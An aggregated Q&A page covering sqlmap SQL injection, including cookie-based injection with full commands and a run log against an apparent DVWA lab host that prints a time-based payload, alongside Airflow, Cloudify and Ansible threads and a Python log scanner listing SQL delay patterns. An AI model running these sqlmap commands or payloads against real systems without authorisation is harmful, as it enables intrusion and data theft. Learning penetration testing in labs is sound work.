Sqlmap tips have injectable but unable to inject - sqlmap

[21:07:29] [INFO] (custom) POST parameter 'JSON phone' appears to be 'MySQL AND time-based blind (ELT)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
sqlmap says the parameter is time-based blind injectable, but when I use the "time-based blind" technique it cannot find the injection.
I use the command: sqlmap -r /Users/yangzhuo/Downloads/sql1.txt --level=5 --risk=3 -vvv --random-agent --technique=T --batch --dbs

Related

How to write airflow logs to Elasticsearch?

I am using Airflow 1.10.5. Can't seem to find complete documentation or sample on how to setup remote logging using Elasticsearch. I saw airflow documentation about logging, but it wasn't helpful. I am trying to write the airflow (not task) logs to ES.
As far as I understand the docs, the ES log handler can only read from ES. You would have to setup your logging to print into a file, then use something like filebeat to post the file content to ES and Airflow can then read them back...
https://airflow.readthedocs.io/en/stable/howto/write-logs.html#writing-logs-to-elasticsearch
Writing Logs to Elasticsearch
Airflow can be configured to read task
logs from Elasticsearch and optionally write logs to stdout in
standard or json format. These logs can later be collected and
forwarded to the Elasticsearch cluster using tools like fluentd,
logstash or others.
I was able to achieve this using the filebeat shipper.
Input config section in filebeat.yml
<snip>
# ============================== Filebeat inputs ===============================
filebeat.inputs:
# Each - is an input. Most options can be set at the input level, so
# you can use different inputs for various configurations.
# Below are the input specific configurations.
- type: log
  # Change to true to enable this input configuration.
  enabled: true
  # Paths that should be crawled and fetched. Glob based paths.
  paths:
    - /path/to/logs/*.log
</snip>
Output config section in filebeat.yml
<snip>
# ---------------------------- Elasticsearch Output ----------------------------
output.elasticsearch:
  # Array of hosts to connect to.
  hosts: ["localhost:9200"]
  # Protocol - either `http` (default) or `https`.
  #protocol: "https"
  # Authentication credentials - either API key or username/password.
  #api_key: "id:api_key"
  username: "elastic"
  password: "changeme"
</snip>
Good doc to read especially about airflow --> ES.

What version of Apache Airflow includes the experimental API?

The airflow documentation states:
Airflow exposes an experimental Rest API. It is available through the webserver. Endpoints are available at /api/experimental/. Please note that we expect the endpoint definitions to change.
https://airflow.apache.org/api.html#experimental-rest-api
However, it doesn't state in which version the API appears. We are running Airflow v1.8.0.
But whenever I browse to /api/ or /api/experimental/ I get a 404 and the spinning circles.
I tried curling the same URLs but that only confirmed the same, /api/ gives me a 404:
$ curl -I -L -s http://${AIRFLOWIP}:8080/admin/ | grep HTTP
HTTP/1.1 200 OK
$ curl -I -L -s http://${AIRFLOWIP}:8080/api/ | grep HTTP
HTTP/1.1 404 NOT FOUND
We have this setting in airflow.cfg:
[api]
# How to authenticate users of the API
auth_backend = airflow.api.auth.backend.default
I don't know whether the API is only available in a later version of Airflow or if we have stood it up incorrectly.
Can someone let me know in which version of airflow we can find the experimental API?
The first experimental endpoints were added in 1.8.0, with a few more endpoints added in following releases. There is no endpoint for the root paths of /api/ and /api/experimental/ on any version, so those curls are not expected to work. However, there is a /api/experimental/test/ endpoint which you can hit to confirm the API is available.
If you're going to be using the experimental API, I think the code is the best reference at the moment.
The Airflow API is no longer in the experimental phase.
The stable version is documented here: Airflow REST API.
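A way to run the check the accepted answer suggests, as an added example (not code from the thread or from the Airflow project): probe the root paths, which have no route on any version, and the /api/experimental/test/ endpoint, which answers 200 when the experimental API is mounted. The in-process HTTP server is a constructed stand-in for a webserver so the script runs offline; point the probe at a real base URL to use it. Note that with auth_backend = airflow.api.auth.backend.default, the setting quoted in the question, Airflow 1.x accepts every request to these endpoints without authentication, so "available" on a host reachable beyond the team also means the API is open.

```python
"""Probe an Airflow 1.x webserver for the experimental REST API.

Added example, not from the thread above or the Airflow project. /api/ and
/api/experimental/ have no handler on any version (404 is expected there);
only /api/experimental/test/ tells you whether the API is mounted.
"""
import http.server
import threading
import urllib.error
import urllib.request

# Paths from the thread: the root paths have no handler, the test endpoint does.
ROOT_PATHS = ("/api/", "/api/experimental/")
TEST_PATH = "/api/experimental/test/"


def probe(base_url, path, timeout=5):
    """Return the HTTP status code for GET base_url+path (error codes included)."""
    req = urllib.request.Request(base_url.rstrip("/") + path, method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        return exc.code


def classify_status(code):
    """Map the test endpoint's status to 'available', 'auth-required' or 'missing'."""
    if code == 200:
        return "available"
    if code in (401, 403):
        return "auth-required"
    return "missing"


def api_status(base_url):
    """Classify the experimental API; a 404 on /api/ alone proves nothing."""
    return classify_status(probe(base_url, TEST_PATH))


class _FakeAirflow(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in: answers like a webserver with the API mounted."""

    def do_GET(self):
        if self.path == TEST_PATH:
            self.send_response(200)
            self.send_header("Content-Type", "application/json")
            self.end_headers()
            self.wfile.write(b'{"status": "OK"}')  # constructed body
        else:
            self.send_error(404)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_fake_server():
    """Start the stand-in on an ephemeral loopback port; returns (base_url, server)."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), _FakeAirflow)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return "http://127.0.0.1:%d" % srv.server_address[1], srv


if __name__ == "__main__":
    url, srv = start_fake_server()
    for p in ROOT_PATHS:
        print(p, probe(url, p))        # 404 on both, exactly as in the question
    print(TEST_PATH, api_status(url))  # available
    srv.shutdown()
```

Replace the stand-in URL with http://AIRFLOWIP:8080 to check a real instance; the root paths still return 404 there, which is why the curls in the question were not a useful test.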

Cloudify blueprint upload import error

We have an OpenStack deployment. We chose to deploy Cloudify Manager using the image option, and we are now using the paid version of the manager image. When we tried to upload an OpenStack blueprint from the CLI:
cfy blueprints upload -b vm -p cloudify-nodecellar-example-master/openstack-blueprint.yaml
we get the following error output on the Cloudify manager:
20/12/2017 11:45:21 [INFO] [manager_rest.server] InvalidBlueprintError: Invalid blueprint - Failed to resolve the following urls: {u'file:///opt/manager/resources/spec/cloudify/4.3.dev1/types.yaml': "Import failed: Unable to open import url file:///opt/manager/resources/spec/cloudify/4.3.dev1/types.yaml; "}. In addition, failed to resolve the original import url - Import failed: Unable to open import url http://www.getcloudify.org/spec/cloudify/4.3.dev1/types.yaml; HTTPConnectionPool(host='www.getcloudify.org', port=80): Max retries exceeded with url: /spec/cloudify/4.3.dev1/types.yaml (Caused by NewConnectionError(': Failed to establish a new connection: [Errno -3] Temporary failure in name resolution',))
in: /opt/manager/resources/openstack-blueprint-b03206ec-1bde-4595-8cc0-93de5510f777/openstack-blueprint.yaml
in line: 7, column: 0
path: imports
value: ['http://www.getcloudify.org/spec/cloudify/4.3.dev1/types.yaml', 'http://www.getcloudify.org/spec/openstack-plugin/2.0.1/plugin.yaml', 'http://www.getcloudify.org/spec/diamond-plugin/1.3.6/plugin.yaml', 'types/nodecellar.yaml', 'types/openstack-types.yaml']
20/12/2017 11:45:23 [INFO] [manager_rest.server] Authenticated user:
It seems like there are a few issues, which I will not go through here. The best way to get started is to follow the step-by-step instructions at this link.
If you have any further questions, please feel free to ask them here or in our user group.

~/.ssh/id_rsa.pub not found error while installing capistrano as ansible playbook

I am trying to install https://github.com/roots/bedrock-ansible to get a bedrock deployment (http://roots.io/wordpress-stack/) running.
When I run "vagrant up", after some time I get this error:
TASK: [capistrano-setup | Setup deploy group] *********************************
skipping: [default]
TASK: [capistrano-setup | Setup deploy user] **********************************
skipping: [default]
TASK: [capistrano-setup | Adding public key to server] ************************
fatal: [default] => could not locate file in lookup: ~/.ssh/id_rsa.pub
FATAL: all hosts have already failed -- aborting
PLAY RECAP ********************************************************************
to retry, use: --limit #/Users/johannes/site.retry
default : ok=46 changed=16 unreachable=1 failed=0
Ansible failed to complete successfully. Any error output should be
visible above. Please fix these errors and try again.
I do not have a clue how I can fix this. Do you have an idea?
It seems the role is trying to find your local public key. It should be in the location in the error message '~/.ssh/id_rsa.pub', but it's not. So either you don't have one, or you keep it in another location.
If you're not familiar with generating SSH keys you probably don't have one. I personally like the GitHub help page for this: https://help.github.com/articles/generating-ssh-keys/
(you only have to perform steps 1 and 2).
If you do have SSH keys, but in a different location, the capistrano-install role in bedrock uses some variables:
deploy_user: deploy
deploy_keys:
  - "~/.ssh/id_rsa.pub"
So you can set (multiple) public key files in the deploy_keys list and they will be added to the deploy_user's authorized keys.
All this is needed because Capistrano will use the deploy user to connect to the remote server later. http://blakesmith.me/2010/02/08/understanding-public-key-private-key-concepts.html
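A pre-flight check for the deploy_keys list, as an added example (not part of bedrock-ansible or its capistrano-setup role): it mirrors the lookup that failed in the question, expanding '~' and reporting a missing file, and it also rejects the other easy slip of pointing an entry at id_rsa instead of id_rsa.pub, which would copy the private key into the deploy user's authorized_keys. The sample key files it writes are constructed fixtures, not real keys.

```python
"""Check a deploy_keys list before Ansible pushes it to authorized_keys.

Added example, not part of bedrock-ansible. Each entry is tilde-expanded and
must exist, and its first line must be a public key line; a PRIVATE KEY block
is rejected so the secret half never lands in authorized_keys.
"""
import os
import tempfile

# Key types that may legitimately start an authorized_keys line.
PUBLIC_KEY_TYPES = (
    "ssh-rsa", "ssh-ed25519",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
)


def check_deploy_key(path):
    """Return (ok, reason) for one deploy_keys entry; '~' is expanded as Ansible does."""
    full = os.path.expanduser(path)
    if not os.path.isfile(full):
        return False, "could not locate file in lookup: %s" % path
    with open(full, "r", encoding="utf-8", errors="replace") as fh:
        first = fh.readline().strip()
    if "PRIVATE KEY" in first:
        return False, "%s holds a private key, use the .pub file" % path
    if first.split(" ", 1)[0] not in PUBLIC_KEY_TYPES:
        return False, "%s does not start with a known public key type" % path
    return True, "ok"


def check_deploy_keys(paths):
    """Check every entry; returns {path: reason} for the ones that fail."""
    problems = {}
    for p in paths:
        ok, reason = check_deploy_key(p)
        if not ok:
            problems[p] = reason
    return problems


def write_sample_keys():
    """Constructed fixtures in a temp dir: a public key, a private key, a missing path."""
    d = tempfile.mkdtemp(prefix="deploy_keys_")
    pub = os.path.join(d, "id_ed25519.pub")
    priv = os.path.join(d, "id_ed25519")
    with open(pub, "w") as fh:  # constructed sample, not a usable key
        fh.write("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedSampleKeyMaterial deploy@example\n")
    with open(priv, "w") as fh:  # constructed header only
        fh.write("-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed\n-----END OPENSSH PRIVATE KEY-----\n")
    return {"pub": pub, "priv": priv, "missing": os.path.join(d, "id_rsa.pub")}


if __name__ == "__main__":
    keys = write_sample_keys()
    for path, reason in check_deploy_keys(keys.values()).items():
        print("deploy_keys entry rejected:", reason)
```

Run it against the real list from group_vars before vagrant up; the "could not locate file in lookup" message is the same one Ansible printed in the question, surfaced before the play starts.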

How to inject a part of cookie using sqlmap

I need to do SQL injection on part of a cookie using sqlmap. The target URL is static.
A sample cookie:
Cookie1=blah_var1/blah_val1/blah_var2/blah_val2/searchtext/userinput/blah_var3/blah_val3/.../
In this cookie I need to inject the "userinput" value using sqlmap. I know about the --cookie parameter, but it won't work in this case, since only part of the cookie has to be injected using sqlmap.
I don't know how to do this. Please help.
I got the same problem injecting SQL in a cookie. I looked at its help and its code, and now finally something made sense; let me put my hypothesis:
Cookie-based injection works only with level>=2.
You need to specify --param-filter='COOKIE'.
Do not let sqlmap try URI injections when it asks, or else it will fail by doing GET/POST-based testing.
If you specify a custom injection marker on that testable cookie, do not proceed with it when asked, or else it will fail.
I didn't try so many combinations on the 3rd and 4th points, feel free to invalidate them. Okay so, try something like this:
sqlmap -u 'protocol://test.server/test_url/' --cookie='id=*; PHPSESSID=jh3c0eqqu03mlcvjh1ddjj1spr; security=high' -p 'id' --param-filter='COOKIE' --skip='PHPSESSID,security' --flush-session --fresh-queries --proxy='https://localhost:7777' --dbs --dbms='mysql' --os='linux' --ignore-code=404 --output-dir=./sqlmapdir/ --level=2
The options necessary for cookie-based testing are: -u, --cookie, -p, --param-filter, --level.
Command tried on sqlmap version: 1.4.8#stable
output:
$ sqlmap -u 'http://dvwa.local/vulnerabilities/sqli_blind/' --cookie='id=*; PHPSESSID=jh3c0eqqu03mlcvjh1ddjj1spr; security=high' -p 'id' --param-filter='COOKIE' --skip='PHPSESSID,security' --flush-session --fresh-queries --proxy='https://localhost:7777' --dbs --dbms='mysql' --os='linux' --ignore-code=404 --output-dir=./sqlmapdir/ --level=2
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting # 01:18:36 /2020-08-31/
[01:18:36] [WARNING] using '/home/dinesh/Documents/work/workspaces/git_temp_projs/dvwa/SQL_Injection_Blind/sqlmapdir' as the output directory
[01:18:36] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site_com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] n
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] n
[01:18:39] [INFO] testing connection to the target URL
[01:18:40] [INFO] testing if the target URL content is stable
[01:18:43] [INFO] target URL content is stable
do you want to URL encode cookie values (implementation specific)? [Y/n] y
[01:19:01] [WARNING] heuristic (basic) test shows that Cookie parameter 'id' might not be injectable
[01:19:02] [INFO] testing for SQL injection on Cookie parameter 'id'
[01:19:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:19:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[01:19:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[01:19:15] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[01:19:17] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[01:19:17] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[01:19:17] [INFO] testing 'Generic inline queries'
[01:19:17] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[01:19:22] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[01:19:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:19:26] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[01:19:31] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:19:32] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[01:19:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[01:19:47] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[01:19:50] [INFO] testing 'MySQL inline queries'
[01:19:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[01:19:52] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[01:19:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[01:20:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[01:20:33] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[01:21:28] [INFO] Cookie parameter 'id' appears to be 'MySQL >= 5.0.12 RLIKE time-based blind' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (1) values? [Y/n] n
[01:23:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:23:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[01:23:47] [INFO] target URL appears to be UNION injectable with 2 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
[01:24:08] [WARNING] if UNION based SQL injection is not detected, please consider usage of option '--union-char' (e.g. '--union-char=1')
[01:24:08] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[01:24:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[01:24:27] [INFO] testing 'MySQL UNION query (65) - 21 to 40 columns'
[01:24:36] [INFO] checking if the injection point on Cookie parameter 'id' is a false positive
Cookie parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 262 HTTP(s) requests:
---
Parameter: id (Cookie)
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: id=*' RLIKE SLEEP(5) AND 'EZrr'='EZrr; PHPSESSID=jh3c0eqqu03mlcvjh1ddjj1spr; security=high
---
[01:50:27] [INFO] the back-end DBMS is MySQL
[01:50:27] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:50:52] [INFO] fetching database names
[01:50:52] [INFO] fetching number of databases
[01:50:52] [INFO] retrieved: 2
[01:51:42] [INFO] retrieved: information_schema
[02:16:58] [INFO] retrieved: dvwa
available databases [2]:
[*] dvwa
[*] information_schema
[02:22:32] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 414 times
[02:22:32] [INFO] fetched data logged to text files under '/home/dinesh/Documents/work/workspaces/git_temp_projs/dvwa/SQL_Injection_Blind/sqlmapdir/dvwa.local'
[*] ending # 02:22:32 /2020-08-31/
Intercept the request, save it to a file and then give that file to sqlmap with the -r parameter; by default sqlmap should check the cookie.
sqlmap.py -r request.txt
You can use Tamper Data (a Firefox extension) or the free version of Burp proxy to intercept the request.
Try something like this:
sqlmap.py -u localhost/vulnerable --cookie="STATE_COOKIE=%2F1%2F_VMD%2F1%26_REQS%2F_RVID%2FCriteriaResourceFilter%2F_TIME%2F1403689244638%2F_ORVID%2FPassTrixMain%2FSEARCH_COLUMN%2FRESOURCENAME%2FSEARCH_VALUE%2Fsearchtext*"
This will test the parameter auth in the cookie:
sqlmap -u "website" --cookie='auth=blabla; uuid=blabla' -p auth --level=2
Level must be at least 2. This isn't the only way to specify the parameter to test, you can also use * to specify the injection point.
sqlmap -u "website" --cookie='auth=blabla; uuid=*' --level=2
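The defender's side of both sqlmap threads on this page, as an added example that is not sqlmap code and not from any answer above: the first question reports a parameter that "appears to be" time-based blind injectable, and the cookie thread shows exactly what such a probe looks like on the wire (id=*' RLIKE SLEEP(5) AND 'EZrr'='EZrr in the Cookie header). Time-based detection only ever rests on response latency, which is also what makes it visible server-side. This scanner reads constructed access-log lines that record the Cookie header and the response time (the log format is an assumption, labelled in the code), URL-decodes each cookie value, and reports entries that carry a database delay primitive, marking those whose response was also slow.

```python
"""Flag time-based blind SQL injection probes carried in cookies.

Added example for a defender; not sqlmap code. It scans constructed access log
lines, URL-decodes cookie values (the quote arrives as %27) and reports values
that contain a delay primitive, noting whether the response was slow, which is
the signal that the injected condition actually executed.
"""
import re
from urllib.parse import unquote_plus

# Delay primitives used by time-based payloads across common DBMSs.
DELAY_PATTERNS = [
    re.compile(p, re.IGNORECASE) for p in (
        r"\bSLEEP\s*\(",            # MySQL / MariaDB
        r"\bBENCHMARK\s*\(",        # MySQL
        r"\bPG_SLEEP\s*\(",         # PostgreSQL
        r"\bWAITFOR\s+DELAY\b",     # MSSQL
        r"\bDBMS_LOCK\.SLEEP\b",    # Oracle
    )
]

# Assumed (constructed) log format: ip "METHOD path" status resp_ms "cookie-header"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3}) '
    r'(?P<ms>\d+) "(?P<cookie>[^"]*)"$'
)


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ms"] = int(rec["ms"])
    return rec


def cookie_values(header):
    """Split 'a=1; b=2' into {name: decoded value}; decoding exposes %27 quotes."""
    out = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            out[name] = unquote_plus(value)
    return out


def delay_hits(value):
    """Names of the delay primitives found in one decoded cookie value."""
    return [p.pattern for p in DELAY_PATTERNS if p.search(value)]


def scan(lines, slow_ms=3000):
    """One finding per log line whose cookie carries a delay primitive.

    'slow' is True when the response took at least slow_ms, i.e. the delay
    fired; a primitive without a slow response is still worth an alert, since
    sqlmap sends the same payload under conditions that are meant to be false.
    """
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in cookie_values(rec["cookie"]).items():
            hits = delay_hits(value)
            if hits:
                findings.append({
                    "ip": rec["ip"], "path": rec["path"], "cookie": name,
                    "primitives": hits, "slow": rec["ms"] >= slow_ms,
                })
    return findings


# Constructed sample lines (not real traffic). The second copies the payload
# shape sqlmap printed in the thread, URL-encoded as a client would send it.
SAMPLE_LOG = [
    '10.0.0.5 "GET /vulnerabilities/sqli_blind/" 200 120 "id=1; security=high"',
    '10.0.0.5 "GET /vulnerabilities/sqli_blind/" 200 5210 '
    '"id=1%27%20RLIKE%20SLEEP%285%29%20AND%20%27EZrr%27%3D%27EZrr; security=high"',
    '10.0.0.5 "GET /vulnerabilities/sqli_blind/" 200 140 '
    '"id=1%27%20AND%20BENCHMARK%281000000%2CMD5%281%29%29%20AND%20%27a%27%3D%27a"',
    '10.0.0.9 "GET /search" 200 90 "q=sleep%20well; session=abc"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

The fourth sample line shows why the patterns require a call form: the word "sleep" on its own is not flagged. Decoding before matching matters because the quote and parentheses never appear literally in the raw log.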
